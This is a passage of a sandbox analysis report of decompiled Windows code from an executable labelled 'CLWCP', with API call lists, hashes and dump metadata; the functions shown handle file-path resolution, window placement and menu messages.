                                  				char _v599;
                                  				char* _t65;
                                  				char* _t75;
                                  				void* _t95;
                                  				intOrPtr* _t96;
                                  				char* _t99;
                                  				char* _t101;
                                  				char* _t102;
                                  				void* _t103;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v16 = _v8;
                                  				_v20 = GetModuleHandleA("kernel32.dll");
                                  				if(_v20 == 0) {
                                  					L4:
                                  					if( *_v8 != 0x5c) {
                                  						_t101 = _v8 + 2;
                                  						goto L10;
                                  					} else {
                                  						if( *((char*)(_v8 + 1)) == 0x5c) {
                                  							_t102 = E004051F0(_v8 + 2);
                                  							if( *_t102 != 0) {
                                  								_t17 = _t102 + 1; // 0x1
                                  								_t101 = E004051F0(_t17);
                                  								if( *_t101 != 0) {
                                  									L10:
                                  									_t95 = _t101 - _v8;
                                  									_push(_t95 + 1);
                                  									_push(_v8);
                                  									_push( &_v599);
                                  									L004012A4();
                                  									while( *_t101 != 0) {
                                  										_t99 = E004051F0(_t101 + 1);
                                  										if(_t99 - _t101 + _t95 + 1 <= 0x105) {
                                  											_push(_t99 - _t101 + 1);
                                  											_push(_t101);
                                  											_push( &(( &_v599)[_t95]));
                                  											L004012A4();
                                  											_v20 = FindFirstFileA( &_v599,  &_v338);
                                  											if(_v20 != 0xffffffff) {
                                  												FindClose(_v20);
                                  												_t65 =  &(_v338.cFileName);
                                  												_push(_t65);
                                  												L004012AC();
                                  												if(_t65 + _t95 + 1 + 1 <= 0x105) {
                                  													 *((char*)(_t103 + _t95 - 0x253)) = 0x5c;
                                  													_push(0x105 - _t95 - 1);
                                  													_push( &(_v338.cFileName));
                                  													_push( &(( &(( &_v599)[_t95]))[1]));
                                  													L004012A4();
                                  													_t75 =  &(_v338.cFileName);
                                  													_push(_t75);
                                  													L004012AC();
                                  													_t95 = _t95 + _t75 + 1;
                                  													_t101 = _t99;
                                  													continue;
                                  												}
                                  											}
                                  										}
                                  										goto L17;
                                  									}
                                  									_push(_v12);
                                  									_push( &_v599);
                                  									_push(_v8);
                                  									L004012A4();
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t96 = GetProcAddress(_v20, "GetLongPathNameA");
                                  					if(_t96 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0x105);
                                  						_push( &_v599);
                                  						_push(_v8);
                                  						if( *_t96() == 0) {
                                  							goto L4;
                                  						} else {
                                  							_push(_v12);
                                  							_push( &_v599);
                                  							_push(_v8);
                                  							L004012A4();
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  				return _v16;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040522D
                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405244
                                  • lstrcpyn.KERNEL32(?,?,?), ref: 00405274
                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,?,00000000), ref: 004052D8
                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 0040530E
                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 00405321
                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 00405333
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,00000000), ref: 0040533F
                                  • lstrcpyn.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00405373
                                  • lstrlen.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 0040537F
                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 004053A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                  • API String ID: 3245196872-1565342463
                                  • Opcode ID: b26e80cfdf313e5ddb96466e9586d9babe9bdbeed04ebb562e664aae5d92ee83
                                  • Instruction ID: 7123bbd571bc78044769ff3f97ec35de03461e648d62ba97593c837f7c754d18
                                  • Opcode Fuzzy Hash: b26e80cfdf313e5ddb96466e9586d9babe9bdbeed04ebb562e664aae5d92ee83
                                  • Instruction Fuzzy Hash: CF416D71D00658ABDB10DAE8CC89ADFB7ACEF08344F0404FAA545F7282D7789E448F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00452098(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				char _v12;
                                  				intOrPtr _t157;
                                  				intOrPtr _t161;
                                  				intOrPtr _t163;
                                  				intOrPtr _t164;
                                  				intOrPtr _t165;
                                  				intOrPtr _t169;
                                  				intOrPtr _t174;
                                  				intOrPtr _t176;
                                  				intOrPtr _t177;
                                  				void* _t179;
                                  				struct HWND__* _t180;
                                  				long _t190;
                                  				signed int _t212;
                                  				signed int _t213;
                                  				long _t234;
                                  				intOrPtr _t240;
                                  				int _t245;
                                  				intOrPtr _t246;
                                  				intOrPtr _t255;
                                  				intOrPtr _t259;
                                  				signed int _t262;
                                  				signed int _t265;
                                  				intOrPtr _t266;
                                  				signed int _t272;
                                  				long _t273;
                                  				intOrPtr _t276;
                                  				intOrPtr _t280;
                                  				signed int _t283;
                                  				intOrPtr _t284;
                                  				intOrPtr _t285;
                                  				signed int _t291;
                                  				long _t292;
                                  				intOrPtr _t295;
                                  				signed int _t301;
                                  				signed int _t302;
                                  				void* _t304;
                                  				long _t307;
                                  				intOrPtr _t311;
                                  				struct HWND__* _t316;
                                  				signed int _t318;
                                  				signed int _t319;
                                  				signed int _t322;
                                  				signed int _t324;
                                  				long _t325;
                                  				signed int _t328;
                                  				signed int _t330;
                                  				long _t331;
                                  				void* _t333;
                                  				intOrPtr _t347;
                                  				signed int _t380;
                                  				signed int _t381;
                                  				intOrPtr _t382;
                                  				long _t390;
                                  				void* _t392;
                                  				void* _t393;
                                  				intOrPtr _t394;
                                  
                                  				_t392 = _t393;
                                  				_t394 = _t393 + 0xfffffff8;
                                  				_v12 = 0;
                                  				_v8 = __eax;
                                  				_push(_t392);
                                  				_push(0x452647);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t394;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x328) & 0x00000004) != 0) {
                                  					_t311 =  *0x46fdb4; // 0x41b648
                                  					E00405C70(_t311,  &_v12);
                                  					E0040B830(_v12, 1);
                                  					E00403B64();
                                  				}
                                  				_t157 =  *0x470b40; // 0x0
                                  				E00456FBC(_t157);
                                  				 *(_v8 + 0x328) =  *(_v8 + 0x328) | 0x00000004;
                                  				_push(_t392);
                                  				_push(0x45262a);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t394;
                                  				if(( *(_v8 + 0x1c) & 0x00000010) != 0) {
                                  					_t161 = _v8;
                                  					__eflags =  *(_t161 + 0x1c) & 0x00000010;
                                  					if(( *(_t161 + 0x1c) & 0x00000010) != 0) {
                                  						_t164 = _v8;
                                  						__eflags =  *(_t164 + 0x30);
                                  						if( *(_t164 + 0x30) != 0) {
                                  							_t165 = _v8;
                                  							__eflags =  *((char*)(_t165 + 0x1ae));
                                  							if( *((char*)(_t165 + 0x1ae)) != 0) {
                                  								ShowWindow(E0043BA58(_v8), 1);
                                  							}
                                  						}
                                  					}
                                  					L82:
                                  					_pop(_t347);
                                  					 *[fs:eax] = _t347;
                                  					_push(0x452631);
                                  					_t163 = _v8;
                                  					 *(_t163 + 0x328) =  *(_t163 + 0x328) & 0x000000fb;
                                  					return _t163;
                                  				}
                                  				_t169 = _v8;
                                  				_t398 =  *((char*)(_t169 + 0x1ae));
                                  				if( *((char*)(_t169 + 0x1ae)) == 0) {
                                  					_push(_t392);
                                  					_push(0x4524fb);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t394;
                                  					E00403594(_v8, __eflags);
                                  					 *[fs:eax] = 0;
                                  					_t174 =  *0x470b44; // 0x0
                                  					__eflags =  *((intOrPtr*)(_t174 + 0x6c)) - _v8;
                                  					if( *((intOrPtr*)(_t174 + 0x6c)) == _v8) {
                                  						__eflags = 0;
                                  						E00451074(_v8, 0);
                                  					}
                                  					_t176 = _v8;
                                  					__eflags =  *((char*)(_t176 + 0x247)) - 1;
                                  					if( *((char*)(_t176 + 0x247)) != 1) {
                                  						_t177 = _v8;
                                  						__eflags =  *(_t177 + 0x328) & 0x00000008;
                                  						if(( *(_t177 + 0x328) & 0x00000008) == 0) {
                                  							_t316 = 0;
                                  							_t179 = E0043BA58(_v8);
                                  							_t180 = GetActiveWindow();
                                  							__eflags = _t179 - _t180;
                                  							if(_t179 == _t180) {
                                  								_t190 = IsIconic(E0043BA58(_v8));
                                  								__eflags = _t190;
                                  								if(_t190 == 0) {
                                  									_t316 = E0044C664(E0043BA58(_v8));
                                  								}
                                  							}
                                  							__eflags = _t316;
                                  							if(_t316 == 0) {
                                  								ShowWindow(E0043BA58(_v8), 0);
                                  							} else {
                                  								SetWindowPos(E0043BA58(_v8), 0, 0, 0, 0, 0, 0x97);
                                  								SetActiveWindow(_t316);
                                  							}
                                  						} else {
                                  							SetWindowPos(E0043BA58(_v8), 0, 0, 0, 0, 0, 0x97);
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)( *_v8 + 0xb0))();
                                  					}
                                  					goto L82;
                                  				}
                                  				_push(_t392);
                                  				_push(0x452150);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t394;
                                  				E00403594(_v8, _t398);
                                  				 *[fs:eax] = 0;
                                  				if( *(_v8 + 0x248) == 4 ||  *(_v8 + 0x248) == 6 &&  *((char*)(_v8 + 0x247)) == 1) {
                                  					if( *((char*)(_v8 + 0x247)) != 1) {
                                  						_t318 = E00453A88() -  *(_v8 + 0x48);
                                  						__eflags = _t318;
                                  						_t319 = _t318 >> 1;
                                  						if(_t318 < 0) {
                                  							asm("adc ebx, 0x0");
                                  						}
                                  						_t212 = E00453A7C() -  *(_v8 + 0x4c);
                                  						__eflags = _t212;
                                  						_t213 = _t212 >> 1;
                                  						if(_t212 < 0) {
                                  							asm("adc eax, 0x0");
                                  						}
                                  					} else {
                                  						_t255 =  *0x470b40; // 0x0
                                  						_t322 = E00434590( *((intOrPtr*)(_t255 + 0x44))) -  *(_v8 + 0x48);
                                  						_t319 = _t322 >> 1;
                                  						if(_t322 < 0) {
                                  							asm("adc ebx, 0x0");
                                  						}
                                  						_t259 =  *0x470b40; // 0x0
                                  						_t262 = E004345D4( *((intOrPtr*)(_t259 + 0x44))) -  *(_v8 + 0x4c);
                                  						_t213 = _t262 >> 1;
                                  						if(_t262 < 0) {
                                  							asm("adc eax, 0x0");
                                  						}
                                  					}
                                  					if(_t319 < 0) {
                                  						_t319 = 0;
                                  					}
                                  					if(_t213 < 0) {
                                  						_t213 = 0;
                                  					}
                                  					 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  					if( *((char*)(_v8 + 0x57)) != 0) {
                                  						E0044FFF8(_v8);
                                  					}
                                  					goto L59;
                                  				} else {
                                  					_t265 =  *(_v8 + 0x248) & 0x000000ff;
                                  					__eflags = _t265 + 0xfa - 2;
                                  					if(_t265 + 0xfa - 2 >= 0) {
                                  						__eflags = _t265 - 5;
                                  						if(_t265 == 5) {
                                  							_t266 = _v8;
                                  							__eflags =  *((char*)(_t266 + 0x247)) - 1;
                                  							if( *((char*)(_t266 + 0x247)) != 1) {
                                  								_t324 = E00453AB8() -  *(_v8 + 0x48);
                                  								__eflags = _t324;
                                  								_t325 = _t324 >> 1;
                                  								if(_t324 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t272 = E00453AAC() -  *(_v8 + 0x4c);
                                  								__eflags = _t272;
                                  								_t273 = _t272 >> 1;
                                  								if(_t272 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							} else {
                                  								_t276 =  *0x470b40; // 0x0
                                  								_t328 = E00434590( *((intOrPtr*)(_t276 + 0x44))) -  *(_v8 + 0x48);
                                  								__eflags = _t328;
                                  								_t325 = _t328 >> 1;
                                  								if(_t328 < 0) {
                                  									asm("adc ebx, 0x0");
                                  								}
                                  								_t280 =  *0x470b40; // 0x0
                                  								_t283 = E004345D4( *((intOrPtr*)(_t280 + 0x44))) -  *(_v8 + 0x4c);
                                  								__eflags = _t283;
                                  								_t273 = _t283 >> 1;
                                  								if(_t283 < 0) {
                                  									asm("adc eax, 0x0");
                                  								}
                                  							}
                                  							__eflags = _t325;
                                  							if(_t325 < 0) {
                                  								_t325 = 0;
                                  								__eflags = 0;
                                  							}
                                  							__eflags = _t273;
                                  							if(_t273 < 0) {
                                  								_t273 = 0;
                                  								__eflags = 0;
                                  							}
                                  							 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  						}
                                  					} else {
                                  						_t284 =  *0x470b40; // 0x0
                                  						_t390 =  *(_t284 + 0x44);
                                  						_t285 = _v8;
                                  						__eflags =  *((char*)(_t285 + 0x248)) - 7;
                                  						if( *((char*)(_t285 + 0x248)) == 7) {
                                  							_t382 =  *0x44ae0c; // 0x44ae58
                                  							_t307 = E00403524( *(_v8 + 4), _t382);
                                  							__eflags = _t307;
                                  							if(_t307 != 0) {
                                  								_t390 =  *(_v8 + 4);
                                  							}
                                  						}
                                  						__eflags = _t390;
                                  						if(_t390 == 0) {
                                  							_t330 = E00453A88() -  *(_v8 + 0x48);
                                  							__eflags = _t330;
                                  							_t331 = _t330 >> 1;
                                  							if(_t330 < 0) {
                                  								asm("adc ebx, 0x0");
                                  							}
                                  							_t291 = E00453A7C() -  *(_v8 + 0x4c);
                                  							__eflags = _t291;
                                  							_t292 = _t291 >> 1;
                                  							if(_t291 < 0) {
                                  								asm("adc eax, 0x0");
                                  							}
                                  						} else {
                                  							_t333 = E0044E85C(_t390);
                                  							_t301 =  *((intOrPtr*)(_t390 + 0x48)) -  *(_v8 + 0x48);
                                  							__eflags = _t301;
                                  							_t302 = _t301 >> 1;
                                  							if(_t301 < 0) {
                                  								asm("adc eax, 0x0");
                                  							}
                                  							_t331 = _t333 + _t302;
                                  							_t304 = E0044E87C(_t390);
                                  							_t380 =  *((intOrPtr*)(_t390 + 0x4c)) -  *(_v8 + 0x4c);
                                  							__eflags = _t380;
                                  							_t381 = _t380 >> 1;
                                  							if(_t380 < 0) {
                                  								asm("adc edx, 0x0");
                                  							}
                                  							_t292 = _t304 + _t381;
                                  						}
                                  						__eflags = _t331;
                                  						if(_t331 < 0) {
                                  							_t331 = 0;
                                  							__eflags = 0;
                                  						}
                                  						__eflags = _t292;
                                  						if(_t292 < 0) {
                                  							_t292 = 0;
                                  							__eflags = 0;
                                  						}
                                  						 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                  						_t295 = _v8;
                                  						__eflags =  *((char*)(_t295 + 0x57));
                                  						if( *((char*)(_t295 + 0x57)) != 0) {
                                  							E0044FFF8(_v8);
                                  						}
                                  					}
                                  					L59:
                                  					 *(_v8 + 0x248) = 0;
                                  					if( *((char*)(_v8 + 0x247)) != 1) {
                                  						ShowWindow(E0043BA58(_v8),  *(0x46efbc + ( *(_v8 + 0x243) & 0x000000ff) * 4));
                                  					} else {
                                  						if( *(_v8 + 0x243) != 2) {
                                  							ShowWindow(E0043BA58(_v8),  *(0x46efbc + ( *(_v8 + 0x243) & 0x000000ff) * 4));
                                  							_t234 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                  							__eflags = _t234;
                                  							CallWindowProcA(0x4065d4, E0043BA58(_v8), 5, 0, _t234);
                                  							E00434DE4();
                                  						} else {
                                  							_t245 = E0043BA58(_v8);
                                  							_t246 =  *0x470b40; // 0x0
                                  							SendMessageA( *( *((intOrPtr*)(_t246 + 0x44)) + 0x26c), 0x223, _t245, 0);
                                  							ShowWindow(E0043BA58(_v8), 3);
                                  						}
                                  						_t240 =  *0x470b40; // 0x0
                                  						SendMessageA( *( *((intOrPtr*)(_t240 + 0x44)) + 0x26c), 0x234, 0, 0);
                                  					}
                                  					goto L82;
                                  				}
                                  			}
                                  0x00452293
                                  0x004522da
                                  0x004522da
                                  0x004522dd
                                  0x004522df
                                  0x004522e1
                                  0x004522e1
                                  0x004522f1
                                  0x004522f1
                                  0x004522f4
                                  0x004522f6
                                  0x004522f8
                                  0x004522f8
                                  0x00452295
                                  0x0045229c
                                  0x004522a4
                                  0x004522a4
                                  0x004522a7
                                  0x004522a9
                                  0x004522ab
                                  0x004522ab
                                  0x004522ae
                                  0x004522b2
                                  0x004522bd
                                  0x004522bd
                                  0x004522c0
                                  0x004522c2
                                  0x004522c4
                                  0x004522c4
                                  0x004522c7
                                  0x004522c7
                                  0x004522fb
                                  0x004522fd
                                  0x004522ff
                                  0x004522ff
                                  0x004522ff
                                  0x00452301
                                  0x00452303
                                  0x00452305
                                  0x00452305
                                  0x00452305
                                  0x0045231e
                                  0x00452324
                                  0x00452327
                                  0x0045232b
                                  0x00452334
                                  0x00452334
                                  0x0045232b
                                  0x004523e3
                                  0x004523e6
                                  0x004523f7
                                  0x004524cd
                                  0x004523fd
                                  0x00452407
                                  0x0045245a
                                  0x0045246e
                                  0x0045246e
                                  0x00452483
                                  0x0045248b
                                  0x00452409
                                  0x0045240e
                                  0x00452419
                                  0x00452428
                                  0x00452438
                                  0x00452438
                                  0x00452499
                                  0x004524a8
                                  0x004524a8
                                  0x00000000
                                  0x004523f7

                                  APIs
                                  • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00452428
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: LoadMessageSendString
                                  • String ID:
                                  • API String ID: 1946433856-0
                                  • Opcode ID: 7c5c005350a2a5bd02e0dae1c8119e4847148a6960de5ef6528fd61460ad4d71
                                  • Instruction ID: 813a3057853abde8937bc2d61ebf96f65d47f8dbd33b838144ad4d21810eefc1
                                  • Opcode Fuzzy Hash: 7c5c005350a2a5bd02e0dae1c8119e4847148a6960de5ef6528fd61460ad4d71
                                  • Instruction Fuzzy Hash: F2F16134A00644EFD700DBA9CA85B9D77F4AB05305F2440A6FA44EB3A3D7B8EE45DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0043BD64(void* __eax) {
                                  				void* _v28;
                                  				struct _WINDOWPLACEMENT _v56;
                                  				struct tagPOINT _v64;
                                  				intOrPtr _v68;
                                  				void* _t43;
                                  				struct HWND__* _t45;
                                  				struct tagPOINT* _t47;
                                  
                                  				_t47 =  &(_v64.y);
                                  				_t43 = __eax;
                                  				if(IsIconic( *(__eax + 0x188)) == 0) {
                                  					GetWindowRect( *(_t43 + 0x188), _t47);
                                  				} else {
                                  					_v56.length = 0x2c;
                                  					GetWindowPlacement( *(_t43 + 0x188),  &_v56);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  				}
                                  				if((GetWindowLongA( *(_t43 + 0x188), 0xfffffff0) & 0x40000000) != 0) {
                                  					_t45 = GetWindowLongA( *(_t43 + 0x188), 0xfffffff8);
                                  					if(_t45 != 0) {
                                  						ScreenToClient(_t45, _t47);
                                  						ScreenToClient(_t45,  &_v64);
                                  					}
                                  				}
                                  				 *(_t43 + 0x40) = _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                  				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                  				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                  				return E004341BC(_t43);
                                  			}











                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                  • String ID: ,
                                  • API String ID: 2266315723-3772416878
                                  • Opcode ID: 0056543ba3a9f264186b254670aa887d9c75c2b9b33c110290d12ee4075cf235
                                  • Instruction ID: 5985a99f6a37a5f65777e8b544df51ad7d09521af5a52025bbe2b042f6b38b10
                                  • Opcode Fuzzy Hash: 0056543ba3a9f264186b254670aa887d9c75c2b9b33c110290d12ee4075cf235
                                  • Instruction Fuzzy Hash: 08116371505200AFCB40EF6DC885E8B77D8AF49314F05493EBE58DB286DB39D9008BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E00449828(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				struct HMENU__* _v12;
                                  				signed int _v16;
                                  				signed int _v17;
                                  				intOrPtr _v24;
                                  				int _v28;
                                  				struct HDC__* _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				intOrPtr _t137;
                                  				signed int _t138;
                                  				intOrPtr _t144;
                                  				signed int _t150;
                                  				signed int _t151;
                                  				intOrPtr* _t153;
                                  				void* _t158;
                                  				struct HMENU__* _t160;
                                  				intOrPtr* _t165;
                                  				void* _t173;
                                  				signed int _t177;
                                  				signed int _t181;
                                  				void* _t182;
                                  				void* _t214;
                                  				struct HDC__* _t221;
                                  				void* _t251;
                                  				signed int _t257;
                                  				void* _t265;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t274;
                                  				signed int _t275;
                                  				signed int _t277;
                                  				signed int _t278;
                                  				signed int _t280;
                                  				signed int _t281;
                                  				signed int _t283;
                                  				signed int _t284;
                                  				signed int _t286;
                                  				signed int _t287;
                                  				signed int _t290;
                                  				signed int _t291;
                                  				intOrPtr _t311;
                                  				intOrPtr _t333;
                                  				intOrPtr _t342;
                                  				intOrPtr _t346;
                                  				intOrPtr* _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t356;
                                  				signed int _t367;
                                  				signed int _t368;
                                  				signed int _t369;
                                  				signed int _t370;
                                  				signed int _t371;
                                  				signed int _t372;
                                  				signed int _t373;
                                  				intOrPtr* _t375;
                                  				void* _t377;
                                  				void* _t378;
                                  				intOrPtr _t379;
                                  				void* _t380;
                                  
                                  				_t377 = _t378;
                                  				_t379 = _t378 + 0xffffffd0;
                                  				_v52 = 0;
                                  				_t375 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t377);
                                  				_push(0x449d5c);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t379;
                                  				_t137 =  *__edx;
                                  				_t380 = _t137 - 0x111;
                                  				if(_t380 > 0) {
                                  					_t138 = _t137 - 0x117;
                                  					__eflags = _t138;
                                  					if(_t138 == 0) {
                                  						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t271;
                                  						if(_t271 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t272 = _t271 + 1;
                                  							_t367 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								_t150 = E00448978(E00413D2C(_v8, _t367),  *(_t375 + 4), __eflags);
                                  								__eflags = _t150;
                                  								if(_t150 != 0) {
                                  									goto L68;
                                  								}
                                  								_t367 = _t367 + 1;
                                  								_t272 = _t272 - 1;
                                  								__eflags = _t272;
                                  								if(_t272 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  					} else {
                                  						_t151 = _t138 - 8;
                                  						__eflags = _t151;
                                  						if(_t151 == 0) {
                                  							_v17 = 0;
                                  							__eflags =  *(__edx + 6) & 0x00000010;
                                  							if(( *(__edx + 6) & 0x00000010) != 0) {
                                  								_v17 = 1;
                                  							}
                                  							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t274;
                                  							if(__eflags < 0) {
                                  								L32:
                                  								_t153 =  *0x46fc50; // 0x470b40
                                  								E00456ECC( *_t153, 0, __eflags);
                                  								goto L67;
                                  							} else {
                                  								_t275 = _t274 + 1;
                                  								_t368 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									__eflags = _v17 - 1;
                                  									if(_v17 != 1) {
                                  										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                  									} else {
                                  										_t160 =  *(_t375 + 8);
                                  										__eflags = _t160;
                                  										if(_t160 == 0) {
                                  											_v12 = 0xffffffff;
                                  										} else {
                                  											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                  										}
                                  									}
                                  									_t158 = E00413D2C(_v8, _t368);
                                  									_t295 = _v17 & 0x000000ff;
                                  									_v16 = E004488BC(_t158, _v17 & 0x000000ff, _v12);
                                  									__eflags = _v16;
                                  									if(__eflags != 0) {
                                  										break;
                                  									}
                                  									_t368 = _t368 + 1;
                                  									_t275 = _t275 - 1;
                                  									__eflags = _t275;
                                  									if(__eflags != 0) {
                                  										continue;
                                  									} else {
                                  										goto L32;
                                  									}
                                  									goto L68;
                                  								}
                                  								E00431B28( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                  								_t165 =  *0x46fc50; // 0x470b40
                                  								E00456ECC( *_t165, _v52, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t151 == 1;
                                  							if(_t151 == 1) {
                                  								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t277;
                                  								if(_t277 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t278 = _t277 + 1;
                                  									_t369 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v48 = E00413D2C(_v8, _t369);
                                  										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                  										__eflags = _t173 -  *(_t375 + 8);
                                  										if(_t173 ==  *(_t375 + 8)) {
                                  											break;
                                  										}
                                  										_t177 = E004488BC(_v48, 1,  *(_t375 + 8));
                                  										__eflags = _t177;
                                  										if(_t177 == 0) {
                                  											_t369 = _t369 + 1;
                                  											_t278 = _t278 - 1;
                                  											__eflags = _t278;
                                  											if(_t278 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  										} else {
                                  											break;
                                  										}
                                  										goto L68;
                                  									}
                                  									E00449408(_v48, _t375);
                                  								}
                                  							} else {
                                  								goto L67;
                                  							}
                                  						}
                                  					}
                                  					goto L68;
                                  				} else {
                                  					if(_t380 == 0) {
                                  						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  						__eflags = _t280;
                                  						if(_t280 < 0) {
                                  							goto L67;
                                  						} else {
                                  							_t281 = _t280 + 1;
                                  							_t370 = 0;
                                  							__eflags = 0;
                                  							while(1) {
                                  								E00413D2C(_v8, _t370);
                                  								_t181 = E0044895C( *(_t375 + 4) & 0x0000ffff, __eflags);
                                  								__eflags = _t181;
                                  								if(_t181 != 0) {
                                  									goto L68;
                                  								}
                                  								_t370 = _t370 + 1;
                                  								_t281 = _t281 - 1;
                                  								__eflags = _t281;
                                  								if(_t281 != 0) {
                                  									continue;
                                  								} else {
                                  									goto L67;
                                  								}
                                  								goto L68;
                                  							}
                                  						}
                                  						goto L68;
                                  					} else {
                                  						_t182 = _t137 - 0x2b;
                                  						if(_t182 == 0) {
                                  							_v40 =  *((intOrPtr*)(__edx + 8));
                                  							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  							__eflags = _t283;
                                  							if(_t283 < 0) {
                                  								goto L67;
                                  							} else {
                                  								_t284 = _t283 + 1;
                                  								_t371 = 0;
                                  								__eflags = 0;
                                  								while(1) {
                                  									_v16 = E004488BC(E00413D2C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                  									__eflags = _v16;
                                  									if(_v16 != 0) {
                                  										break;
                                  									}
                                  									_t371 = _t371 + 1;
                                  									_t284 = _t284 - 1;
                                  									__eflags = _t284;
                                  									if(_t284 != 0) {
                                  										continue;
                                  									} else {
                                  										goto L67;
                                  									}
                                  									goto L69;
                                  								}
                                  								_v24 = E0041DFC8(0, 1);
                                  								_push(_t377);
                                  								_push(0x449b8f);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
